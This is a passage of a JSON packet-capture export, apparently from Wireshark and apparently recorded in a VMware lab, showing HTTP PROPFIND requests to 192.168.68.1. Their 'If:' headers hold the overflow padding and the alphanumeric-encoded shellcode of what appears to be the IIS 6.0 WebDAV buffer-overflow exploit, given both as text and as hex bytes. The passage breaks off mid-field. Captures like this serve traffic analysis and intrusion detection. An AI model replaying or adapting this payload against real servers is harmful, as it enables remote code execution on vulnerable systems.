"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/GPFeMIVkTjbNiOrSREgCvcklOoLVXUGcjnxBcSPoYQKoyQrZlaDIvRLEEezUcpXosPrNyWeXrqEW<45><57><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/LPsyZgFMVtRipUKdTvzSGJNCmcNwHmHyQYWEGlxkgnOIxlHqHUlHxoPnyemnThvvSsYSfVEurhHQ<48><51><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "482"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.867399000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.867399000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003658000",
|
||
"frame.time_relative": "17.118339000",
|
||
"frame.number": "489",
|
||
"frame.len": "279",
|
||
"frame.cap_len": "279",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "265",
|
||
"ip.id": "0x000077f3",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000b894",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "41723",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "41723",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "71",
|
||
"tcp.len": "213",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "43745597",
|
||
"tcp.nxtseq": "1662",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1910491122",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00002570",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:83:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:83:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868675",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000473000",
|
||
"tcp.analysis.bytes_in_flight": "1661",
|
||
"tcp.analysis.push_bytes_sent": "1661"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000740000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "488",
|
||
"tcp.segment": "489",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1661",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6d:52:47:76:44:50:57:42:4d:46:4a:4f:61:79:78:45:7a:41:4c:58:57:51:6e:57:75:50:6c:4e:76:46:4a:71:67:6f:48:6b:6d:46:6c:54:50:78:45:6f:6d:66:77:55:72:4c:58:4d:78:76:66:66:67:66:59:66:72:65:65:43:4d:41:61:43:53:52:79:41:4d:57:41:e6:9d:85:e4:b9:82:e4:b1:ab:e4:89:8a:e6:a9:8d:e5:a5:ac:e5:99:b6:e4:bd:84:e5:99:b4:e6:b9:a3:e6:b1:98:e7:95:b7:e7:99:b5:e5:a1:95:e4:9d:aa:e6:99:96:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:b1:97:e4:b9:b1:e5:91:95:e7:89:ad:e4:91:b2:e4:89:90:e5:a1:b0:e6:95:87:e6:b9:a7:e4:99:87:e4:8d:90:e7:a9:86:e4:a9:8f:e4:85:94:e7:81:a9:e5:a5:93:e7:a1:ac:e6:bd:97:e5:99:84:e7:8d:b6:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:77:68:4a:6d:63:64:43:75:78:76:56:6a:71:56:4a:66:58:42:44:4f:6e:56:79:46:57:6a:71:67:70:4a:56:78:6a:44:53:62:67:59:78:56:75:75:49:58:6d:50:62:6b:47:4a:65:61:4e:63:58:6f:53:58:72:4e:59:61:47:78:48:73:48:78:72:5a:72:79:50:6b:4b:e5:91:a5:e7:a1:b3:e7:95:97:e4:8d:88:e6:a1:81:e4:91:b9:e7:91:b7:e5:9d:af:e7:8d:91:e4:a9:a8:e5:a1:89:e4:a5:8e:e7:81:a8:e5:91:b4:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:99:b2:e6:b1:85:e5:9d:8e:e5:85:b2:e1:8f:80:e6:a0:83:e5:8d:a1:e6:b1:97:e5:95:87:e4:ad:99:e7:9d:b2:e4:a5:98:e5:9d:89:e7:a5:b5:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/mRGvDPWBMFJOayxEzALXWQnWuPlNvFJqgoHkmFlTPxEomfwUrLXMxvffgfYfreeCMAaCSRyAMWA<57><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/whJmcdCuxvVjqVJfXBDOnVyFWjqgpJVxjDSbgYxVuuIXmPbkGJeaNcXoSXrNYaGxHsHxrZryPkK<6B><4B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFB